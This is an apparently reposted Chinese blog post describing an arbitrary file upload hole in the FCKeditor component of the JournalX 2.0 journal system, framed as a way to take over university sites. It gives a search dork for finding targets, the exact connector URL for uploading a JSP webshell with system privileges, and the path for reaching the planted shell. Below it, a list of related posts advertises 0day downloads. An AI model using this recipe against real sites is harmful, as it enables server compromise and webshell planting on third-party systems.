大学网站沦陷之Journal报刊系统Fckeditor-0day

转载 2011年01月24日 09:20:00

影响版本:JournalX 2.0  
官方网站:http://www.magtech.com.cn

产品介绍:

JournalX 2.0率先为出版社/集团、期刊业推出了整体的解决方案。目前已经在遍布全国的600多家杂志社、十几家出版社得到应用。

google or baidu 关键字:inurl:volumn/current_abs.shtml

因FCKeditor/myconfig.js 过滤不严格导致上传任意格式文件。

在Web根目录访问 /FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector      上传JSP马 = 系统权限。

 上传后访问路径:http://www.sitedirsec.com/UserFiles/File/ 马的名字.jsp

 

相关文章推荐

0day安全:软件漏洞分析技术

  • 2013年04月12日 15:46
  • 58.75MB
  • 下载

报刊订阅管理系统的设计与实现

笔者水平渣渣,迫于毕设的压力,只能自己去摸索 一点东西,笔者的毕设题目是报刊订阅管理系统的设计与实现。报刊订阅是个啥玩意,我得先去了解一下流程,为此,我去某报刊订阅网站注册了一个帐号,流程大概走了一遍...

揭秘家用路由器0day漏洞挖掘技术

  • 2015年08月14日 15:48
  • 2.2MB
  • 下载

ImageMagic[0day]漏洞扫描器

  • 2016年09月13日 10:52
  • 3KB
  • 下载

新型网站木马爆发,众多知名网站沦陷

网站的安全对于互联网始终是一个不得不引起重视的问题,然而新型网站木马的变化无穷无尽,导致现在的诸多网站管理维护人员针对新型的木马得不到见解,Sinesafe安全专家于近日发现了一些新变种的脚本木马使国...

0day漏洞挖掘

  • 2011年12月22日 09:31
  • 3.53MB
  • 下载

IIS 5.0 FTP 0day

  • 2012年02月23日 17:32
  • 7KB
  • 下载

《0Day》之通过覆盖虚表指针来突破GS

对于栈溢出,微软做了GS防护,就是在函数栈帧初始化之后,生成一个随机的cookie,将其保存在EBP之前,同时在.data中也保存一份,在函数返回之前,先检测栈中cookie的值,如果我们还用之前栈溢...

ECSHOP全版本注入0day

  • 2012年12月31日 03:40
  • 1KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:大学网站沦陷之Journal报刊系统Fckeditor-0day
举报原因:
原因补充:

(最多只允许输入30个字)